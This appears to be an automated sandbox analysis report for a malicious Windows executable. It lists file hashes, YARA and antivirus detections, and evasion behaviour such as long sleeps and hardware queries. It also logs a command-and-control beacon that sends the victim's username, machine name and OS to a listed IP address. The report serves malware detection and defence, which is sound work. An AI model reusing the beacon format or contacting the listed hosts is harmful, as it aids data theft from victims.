Summary | ZeroBOX

Application.exe

Tags: UPX, Malicious Library, OS Processor Check, PE32, PE File
Category FILE
Machine s1_win7_x6401
Started Dec. 11, 2023, 7:18 p.m.
Completed Dec. 11, 2023, 7:22 p.m.
Size 246.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 dc9d29d62659c29eb6edd2295ad0c4ce
SHA256 fcd9e18762ea954d1170359c067f1bfa966998829b8dadde20f5ecb968a08ed9
CRC32 A5826A3B
ssdeep 6144:cdfmiZ2OlpN7LKWwgfwE2oKNUJgodswXE+AOT94e:cdf9h1LKWwgfwE3JJ
Yara
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

DNS (Name / Response / Post-Analysis Lookup): No hosts contacted.

IP Address     Status  Action
91.92.247.123  Active  Moloch
91.92.247.161  Active  Moloch
91.92.247.96   Active  Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

API               Arguments                 Status  Return  Repeated
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameA  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameW  computer_name: TEST22-PC  1       1       0
GetComputerNameA  computer_name: TEST22-PC  1       1       0
suspicious_features Connection to IP address suspicious_request GET http://91.92.247.96/zhark/api.php?id=f79767bea410708a229488fa01b3db96&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
request GET http://91.92.247.96/zhark/api.php?id=f79767bea410708a229488fa01b3db96&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
description gfsvc.exe tried to sleep 230 seconds, actually delayed analysis time by 230 seconds
description Application.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds
wmi SELECT * FROM Win32_Processor
wmi SELECT * FROM Win32_BaseBoard
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
host 91.92.247.123
host 91.92.247.161
host 91.92.247.96
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SystemBiosVersion
file C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst
Bkav W32.AIDetectMalware
MicroWorld-eScan Gen:Trojan.Heur.RP.puW@bS@FGQfi
Skyhigh BehavesLike.Win32.AdwareLinkury.dh
ALYac Gen:Trojan.Heur.RP.puW@bS@FGQfi
Cylance unsafe
VIPRE Gen:Trojan.Heur.RP.puW@bS@FGQfi
CrowdStrike win/malicious_confidence_90% (D)
Arcabit Trojan.Heur.RP.EBD67A
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
APEX Malicious
BitDefender Gen:Trojan.Heur.RP.puW@bS@FGQfi
Emsisoft Gen:Trojan.Heur.RP.puW@bS@FGQfi (B)
F-Secure Heuristic.HEUR/AGEN.1319014
Trapmine suspicious.low.ml.score
FireEye Generic.mg.dc9d29d62659c29e
Sophos Generic ML PUA (PUA)
Avira HEUR/AGEN.1319014
Kingsoft malware.kb.a.899
GData Gen:Trojan.Heur.RP.puW@bS@FGQfi
Cynet Malicious (score: 100)
VBA32 BScope.Trojan.Wacatac
MAX malware (ai score=81)
Rising Trojan.Generic@AI.98 (RDML:KkcdlBva+xskWtDEn+wO/Q)
SentinelOne Static AI - Malicious PE
BitDefenderTheta AI:Packer.B03E043D1F
Cybereason malicious.c11d4e
DeepInstinct MALICIOUS
dead_host 91.92.247.123:80
dead_host 91.92.247.161:80